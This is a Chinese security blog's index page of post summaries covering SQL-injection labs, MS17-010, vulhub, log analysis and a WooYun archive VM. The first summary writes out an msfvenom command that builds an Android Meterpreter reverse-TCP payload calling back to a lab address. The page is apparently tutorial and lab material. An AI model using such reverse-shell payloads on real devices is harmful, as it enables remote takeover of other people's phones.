随年c

摘要： 首先将kali的网卡调节为桥接模式，使其与物理机可以ping通，在物理机开启一个安卓模拟器。 kali：10.115.28.98 命令: msfvenom -p android/meterpreter/reverse_tcp lhost=10.115.28.98 lport=5555 R>/home 阅读全文

摘要： 恢复内容开始 最近闲来无事，发现一个在线靶场--墨者学院，本次实战就以此为平台，正好利用sqlmap跑一下，熟悉一下。 路径：墨者学院-->在线靶场-->web安全-->sql注入-->sql注入实战--MySQL URL：http://219.153.49.228:48368/show.php?i 阅读全文

摘要： MS17-010远程溢出漏洞（CVE-2017-0143） 描述 继2016年 8 月份黑客组织 Shadow Brokers 放出第一批 NSA “方程式小组”内部黑客工具后，2017 年 4 月 14 日，Shadow Brokers 再次公布了一批新的 NSA 黑客工具，其中包含了一个攻击框架 阅读全文

摘要： 首先还是写一下核心的语句吧。 information_schemaschemata(schema_name)tables(table_schema,table_name)columns(table_schema,table_name,column_name) select schema_name f 阅读全文

摘要： 今天在kali上搭建了vulhub环境，遇到了很多坑，没有写搭建环境的博客，不过都能百度解决。在此记录一下如何使用。 sudo service docker start 启动docker服务 cd ls 命令进入目标文件下（本次实例：vulhub/activemq/cve-2016-3088/） 运 阅读全文

摘要： 知识铺垫 在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询，这篇文章带来的是SQL注入之报错注入篇。 首先我们来细分一下SQL注入分类SQL注入分类： 回显正常 > 联合查询 union select 回显报错 > Duplicate entry() extractvalue() updat 阅读全文

摘要： 环境搭建 这里使用的windows2003+phpstudy2018+sdy1.5 我们解压sdy1.5至phpstudy下WWW文件内，在浏览器中输入127.0.0.1/sdy1.5进行安装 一路通过即可，我就不再赘述。 至此安装成功界面如下，下面我们就进入紧张刺激的实战演练环节喽。 SQL注入环 阅读全文

摘要： Apache日志分析 想要知道什么人在什么时候浏览了网站的哪些内容吗？查看Apache的访问日志就可以知道。访问日志是Apache的标准日志，本文详细解释了访问日志的内容以及相关选项的配置。 一、web日志分析原理 web服务器日志记录了web服务器接受处理请求及运行时错误等各种原始信息。通过对日志 阅读全文

摘要： 下载链接 链接：https://pan.baidu.com/s/1jSmzcWeJh3Z4wbq7wnBwzQ 提取码：ggk2 ①安装nvcat 点击.exe文件进行安装，选择注册，将key.txt文件中的注册码放入即可。 ②远程登录mysql数据库 ③文件→新建连接，填写需要远程登录的信息 ④点 阅读全文

摘要： 文末贴上下载地址 我们来记录一下复活乌云（wooyun）的全过程，作为当年中国最火爆的漏洞库平台。 ①下载文件 ②通过VM打开文件中的.vmx文件 用户名/密码：hancool/qwe123 自行重启虚拟机 并且与主机通信。 ③因为本人的习惯所以用xshell登录。 路径 wooyun_public 阅读全文